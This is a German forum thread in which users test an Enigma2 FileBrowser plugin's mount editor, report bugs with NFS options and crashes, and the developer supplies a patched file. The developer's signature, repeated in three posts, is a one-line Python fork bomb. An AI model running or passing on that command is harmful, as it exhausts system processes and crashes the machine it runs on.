Angepinnt [Plugin] Newnigma2 FileBrowser (ab OE2.2)

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Hallo Kathi,

    ja das wars! Jetzt geht's. Perfekt und Danke! Wieder ein Spielzeug mehr :D

    Bleib jetzt aber wohl doch beim Nuke. Die Schrift beim Filebrowser im Metrix ist fast schwarz wie der Hintergrund und schwer zu lesen smile.

    @hmich: ja ist mir auch gestern schon aufgefallen. Am besten passt wirklich alles beim NukeFHD!

    Schönen Abend noch und LG Tomi
  • Morgen könnt ihr mal testen hab eine editor funktion eingebaut und die 1280 Auflösung bischen angepasst.
    Wenn ihr den Editor startet vergesst nicht am ende auch wenn ihr nichts editiert auf Hinzufügen zu drücken sonst ist der eintrag weg bzw in der confing übernommen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • naja mir passt das editieren nicht, wenn ich es aufgerufen habe und nichts ändern tu mit hinzufügen stehen folgende werte drin:

    Quellcode

    1. rsize=8192,wsize=8192

    obwohl die von mir vorher explicit entfernt wurden :rolleyes:
  • hmich schrieb:

    naja mir passt das editieren nicht, wenn ich es aufgerufen habe und nichts ändern tu mit hinzufügen stehen folgende werte drin:

    Quellcode

    1. rsize=8192,wsize=8192

    obwohl die von mir vorher explicit entfernt wurden :rolleyes:

    Also du änderst das und er übernimmt das nicht ?
    Ich gucke mir das an und behebe das sobald ich das finde.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Ich hab es so verstanden das er diese 2 werte gar nicht benötigt und auch nicht hat in seinem Pfad. Wenn hmich aber auf editieren geht nichts ändert und wieder hinzufügt ist der Wert da. Mann kann ihn zwar änder aber nicht mehr ganz entfernen. Mann bräuchte wohl bei den 2 Werten eine Auswahlmöglichkeit wie deaktivieren.
  • Hi,
    hab mal geschaut. Gute Idee mit der Blocksize Optimization,wurde jetzt auch auf nein richtig erkannt.

    Die Option NLM Locking hatte ich auf nolock, das hat edit nicht erkannt. Das hab ich erst wieder auf nolock stellen müssen.

    Die Option NFS Version hier 3 wurde hinzugefügt, obwohl vorher nicht vorhanden.

    Bis auf die 2 Schönheitsfehler würde ich sagen so passt es bei mir, vielen Dank für das hilfreiche Tool.

    Gruß
  • Hi Kati,

    hab vielleicht auch noch einen wesentlichen Punkt den man anpassen sollte wenn möglich. Wenn man jetzt bei einem angelegtem Pfad auf editieren geht nichts ändert und wieder hinzufügt, dann werden eben Werte vom Plugin, nenne es jetzt mal Default Einstellungen mit übernommen. Das heißt der Pfad ist nicht mehr eins zu eins so wie er vorher war. Vielleicht kann man das noch so programmieren, das sich da gar nichts ändert. Helfe mir hier so das ich meine gesicherte Auto.network per Editor wieder einspiele. Ansonsten prima Arbeit.

    Perfekt wäre es auch noch, wie hmich in der unstable Rubrik geschrieben hat, wenn beim backupmanager diese Files auch mit gesichert werden.

    Schönes Wochenende zusammen! :winke:
  • Schönen Abend Kati,

    eben getestet und die Baustelle ist leider doch noch nicht ganz fertig. Wenn man auf editieren geht, kommt sofort ein greenscreen. Nach hochfahren ist auch der Pfad dann weck. Hinzufügen mit blauer Taste geht aber und funktioniert.

    Hab Dir die Logs angehängt. Die ersten 2 sind vom NUKE und der dritte mit dem Standartskin. Warum der 2. größer ist, kann ich aber ned sagen.

    Du schaffst das schon noch ;)

    Lg tomi
    Dateien
  • OH Sorry
    kopiere mal die datei nach /usr/lib/enigma2/python/Plugins/newnigma2/FileBrowser und mach nen gui restart.
    Die datei ist von meiner box das die neuste die morgen im git iss.
    Dateien
    • AutofsEdit.pyo

      (20,47 kB, 346 mal heruntergeladen, zuletzt: )
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !